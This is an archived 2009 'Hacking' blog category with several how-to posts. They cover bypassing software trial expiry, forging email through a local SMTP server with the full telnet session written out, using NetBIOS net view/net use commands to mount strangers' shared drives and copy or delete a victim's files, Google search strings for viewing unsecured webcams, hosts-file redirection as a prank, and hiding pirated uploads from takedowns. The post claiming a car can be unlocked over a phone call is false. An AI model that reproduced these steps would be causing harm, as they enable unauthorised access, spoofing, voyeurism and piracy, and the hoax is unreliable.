Archive for the ‘Hacking’ Category

How to use Trial Version software forever without Expiration

Saturday, September 12th, 2009

Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.

Time Stopper : use Trial Version software forever without ExpirationTime Stopper : use Trial Version software forever without Expiration

Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.

How it Works

  • Open Time Stopper
  • Browse and select .exe of required trial software
  • Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
  • Choose any time
  • Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.

Size: 844 KB

Email Forging

Wednesday, July 1st, 2009

Most of the email forging tutorials on internet will teach us how to send fake mails connecting to SMTP server of ISP or any other domain.But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.So we have to run our own SMTP server on our computer.SMTP server is a simple software program which can be installed on your computer in few seconds.
Download QK STMP Server:

SMTP Server

SMTP Server


http://www.qksoft.com/qk-smtp-server/

How To Send Fake Emails
This is the SMTP server i am using in my tutorial.Once you download and install the server on your comp then you are all set to send fake emails successfully.This works 100%,so trust me & continue.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1″

4. Set port to “25″

PART B: FORGING EMAIL(SENDING FAKE MAIL)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running).If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:\>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number.SO you are connecting to the SMTP server running on your own computer.

NOTE:The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3.Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message.The response of a OK SMTP server is given below.Message within yellow color is only explanation.

220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email address can be anything of your choice)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient e-mail address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:A test of fake mail
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP.IF SO IT IS CONSIDERED AS BODY OF THE MAIL. Press enter twice so that there is a line gap between the header & body data

End the body of mail by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the mail is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your mail is sent to the recipient)

Net BIOS Hacking

Thursday, June 18th, 2009

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

HAPPY NETBOS HACKING!!

Be careful using “ctrl+c” and “ctrl+v” using internet

Thursday, April 30th, 2009

It is extremely easy to extract the text that is stored in the clipboard to steal your sensitive information.

The copied data that is stored on the clipboard, can be easily accessible over the net by a combination of JavaScript & ASP

To avoid this do as below::


1) Go to ‘Control Panel’. One way to access it is by typing control in Run

2) Go to internet option and select security tab

3) press custom level

4) In the security settings, select disable option under
“Allow paste operation via script” and click OK

THAT’S IT!! Now your sensitive information is safe from hackers.

Orkut Users…! Beware

Thursday, April 30th, 2009

According to the Websense Security Labs, dangerous ‘Malicious Trojan Virus’ is rambling in orkut social networking. They have called for an attention from all orkut users regarding this virus and provided some safety measures to prevent it from creeping into your profile.

This virus may reach your profile as a scrap or mostly as a message providing links that connect to seeking love or porn stuff or quick money making schemes or any others such sought of messages that draw your attention to click on them.

The message sometimes contains several links that appear to lead to the official Orkut Web site. Clicking on a link actually leads to a malicious executable file, which is a Trojan Downloader named “imagem.exe” .
The malicious file opens the legitimate Orkut network login page, and in the background downloads a password stealing Trojan named “msn.exe” and its get copied to various system locations, using different names: “plugin.exe”,”kss.exe.” These copies are bound to the system’s start up.

So Beware and think twice before clicking on any links or scripts coming to you which you feel are not concerned to you or when you don’t know the identity of the sender.

Hope this Helps…

Windows Hack To Redirect any Website

Thursday, April 30th, 2009

With this simple hack you can automatically redirect any website to your desired location. This can be a nice little trick when used as a parental control to redirect porn sites to your desired ones.

Here is how you can do it:

1. Goto Start–>Run… and type    %windir%\system32\drivers\etc

2. From the windows that pops up, find a file named hosts and open it with notepad

3. For example, if you want to redirect blogger.com to bloggersbase.com
(yah I mean it coz bloggersbase is gonna be the next blogger) type below syntax to the last line of the file and save it.

64.225.152.244     blogger.com     #redirect blogger to bloggersbase

In the above syntax 64.225.152.244 is the IP of bloggersbase.
So this is the place to give the IP of the website to which the url entered next has to be redirected. Maintain atleast one space between them.
Also you can add your comments to the line with a “#” symbol before the comment.
Better use this comment section to denote where you have redirected any site for future reference.

Now, when you type blogger.com in your browser address bar you will be taken to bloggersbase. Hope you will be amazed with the happenings.

This can also be used as a dirty little trick on your friends PC, to redirect him to your site when he tries to visit famous sites like Facebook or twitter.

And if you want to remove the redirection just delete the line you have added and save.

Here is how you can find the IP address of any web site:

Go to Start–>Run.. and type cmd or command and click OK which open the Command Prompt Window(DOS).

Now, to know IP address of bloggersbase.com enter the following command

ping bloggersbase.com

This will return a result similar to the following that contains the IP address:
Pinging bloggersbase.com [64.225.152.244] with 32 bytes of data:
. . . . . . .

Try this trick on your PC and post in your valuable comments giving more ideas of where this trick can be used.

plz don’t use this trick for any harassment

How-To Hack Web Cameras Using Google Search Tricks

Thursday, April 30th, 2009

This trick works on all those web cameras without password.
Google Search any of these to hack and view the live web cameras.

inurl:/view/index.shtml

inurl:view/shtml

inurl:”viewerframe?mode=refresh”

SNC-RZ30 HOME

inurl:live view/-AXIS

inurl:”viewerframe?mode=motion”

intitle:Snc-rz30

intitle:liveapplet

inurl:home/

inurl:lvappl

For hacking the web camera on a particular ip address, type in that ip in place of inurl

Try it yourself and post in your valuable comments.

9/11 Q33N notepad trick

Thursday, April 30th, 2009

Do you have a car of your own?? Is it having a remote control car lock system??
Assume that you have locked your car parking it somewhere far from home. On the next day when you wanted your car you have gone there leaving the remote lock at your home. Then How-to open the car door?? The solution is quite simple if you have cellphones, one with you and one at your home.

** Just call some one at home at his/her cell phone and ask for the duplicate keys

** Now, as usual the key chain of duplicate key would also be having the remote control, so ask the person at home to press the unlock key on the remote.

** While the person press the unlock key hold your mobile phone about a 10-12 inches from the car door.

** The unlock signal will travel on the cell phone network and your car will be unlocked

This amazing trick have been tested on many cars and is found working in almost 90% of the cases.

Try it yourself and post in your valuable comments.

Newest method of spamming that cannot be stopped:ASCII Spam

Thursday, April 30th, 2009

An old computer art form is making a comeback as a newer way to evade spam filters.

For decades, computing fans have enjoyed a form of expression called ASCII art that shows pictures or messages as a low-resolution graphic, a grid made of numerous computer characters encoded with the venerable ASCII standard. With a photo digitized with ASCII art, for example, the “#” character can represent a dark pixel and “.” a light pixel. And there are large fonts constructed from an assemblage of individual characters.

Now the technique has surfaced as a way to transmit information that’s hard for spam filters to detect–but that so far, at least, has proved relatively harmless beyond that stage.

An example of ASCII art spam.


An example of ASCII art spam.

“There’s been an upsurge in ASCII spam in the last week…It’s quite effective in getting through filters,” said Chris Boyd, director of malware research at messaging management firm FaceTime Communications.

But earlier efforts to use ASCII art for spam have proven to be duds, he added. “The downside is that 9 times out of 10, it’s completely useless because it’s almost impossible to read, or it’s a really bizarre picture of a naked lady that’s not clickable,” Boyd said.

Evasive maneuvers
Spam filters can detect the word “Viagra” and suspect Web addresses of sites trying to get rich quick by catering to the demand for the drug. But it’s another thing altogether to detect an ASCII art version of the same word. Indeed, an ASCII art spam e-mail reading “Viagra-$1.15? and “Cialis-$1.99? made it past the spam filters of my Yahoo Mail and Gmail accounts.

Google declined to comment specifically on ASCII art spam. “We expect spammers to use every means possible to try to send spam. That’s why we have a very robust spam-fighting effort at Google,” the company said in a statement. Yahoo didn’t respond to a request for comment.

Here’s why it’s clever. One line of the e-mail is “78 46 60 11 04 75 300 38 0348 18 61 55171?–gibberish that hardly resembles part of the word “Viagra” or a suspect URL. But reading it on my screen as part of the overall text, its meaning was clear to me in a flash. And a spam generation program could evade spam filter fingerprinting by randomly substituting other numbers into the text art.

Clever–but largely ineffective
The only trouble for spammers: the very reason the art spam is hard to screen out also makes it, well, somewhat impotent as a spam method.

The example spam I got, for example, didn’t include any handy URLs I could click. There was a Web address in the ASCII art, but I’d have to type it in myself. But adding an active URL to a spam-affiliated site is likely to catch the attention of the spam filter.

“They’ve got this great idea for getting past the servers, but they don’t seem to know how to employ it as effectively as they could,” Boyd said. “Combining this with effective spam techniques might be more effective” for the spammers, he said.

Another problem: With the variety of fonts, computers, and e-mail-reading applications in use today, there are good odds ASCII art spam will look like gibberish to the human reader as well as to the spam-checking filter.

ASCII art in action
Here’s an example of ASCII art from one of many Joerg Seyfferth’s ASCII text generator, one of many on the Internet.



If you're interested in learning more on how spammers work, how they send
billions of emails, you can contact me -LikeMesLolka ( Matthew Jain) on the chatbox,
I'll tell you my PGP public key.


since its notplaintext

Right now the way Bayesian Filter work, they will not be able to counter such SPAM

Hosting files on free servers

Thursday, April 30th, 2009

Most File Sharing sites like RapidShare, Megaupload etc. survive due to peoples’ wish to pirate the “commercial” software. Although uploading stuff on such servers can be unrelaiable – and this guide caters to it.

As the God says,

“Thy Files : multiply and fill the web in the realm of depths, and let knowledge and data flow freely and let all work that has been digitised multiply on the earth once for all, despite the preposterous claims of the beastly commercial patent holders.

Introduction

We are well aware of the problems. We spend time uploading a file somewhere, post it on the web and within minutes/ hours it disappeared due to ” breach of the Hosts terms of service ” .

This is small guide to keeping your files online longer and keeping your downloaders happy.


The issue

Free hosting providers for files pretend that they totally agree with the anti-piracy laws. Which in turn is not true ! Their business model is entirely based around money making from people uploading copyrighted content to their servers (and hence promoting software theft). They mint money from their flashy advertisement banners and “premium” subscription charges that they levy on users wishing to mass download. The issue arises when somebody complains about a file on their servers, usually either who is the owner of the content uploaded or someone who just gets his kicks from having the files taken down. Unfortunately there is not a foolproof way to stop either, but you can prevent this from happening to a good extent using the tacts below.

1- Before Uploading

Firstly, Before uploading your files, make sure you compress them with WinRAR or Winzip. Also use a random password , this shall stop anyone finding your files anywhere but the site you posted them on, which thus prevents them from seeing what’s inside ( until YOU supply the password).

Secondly, give your files a name that is not related to the files actually being posted; just in case if you are uploadi a file named MicrosoftOffice2007.rar, anyone who comes across that file anywhere on the web is going to have a good idea of what’s inside the file and hence can complain and get it taken down from the FileSharing server. Had you renamed it eventphotos.rar anyone coming across the file other than from where you posted it will shall find it uninteresting and ignore it.

2- Distributing files

Use Sharebee, it first uploads the files once to its server, then uploads its copies to several other services giving much more varied choice to people who download your files. This stops downloaders complaining about you using <insert website here> and makes it much more difficult for people to let the file taken down as they then have to send emails to multiple sites. The only site I know of that has survived the kill over time is ShareBee.

3- Link or URL Obfuscation

After uploading the file and getting the download link. Before posting it to a forum/website make sure you use a url obfuscation serive. This stops file indexers putting your file on their services for anyone to easily find and also stops people searching the web for strings like this. Its easy takes seconds a little time only, you’ve to just copy the original download link to one of these services, paste it in, and you get a new link that you can post.

TinyURL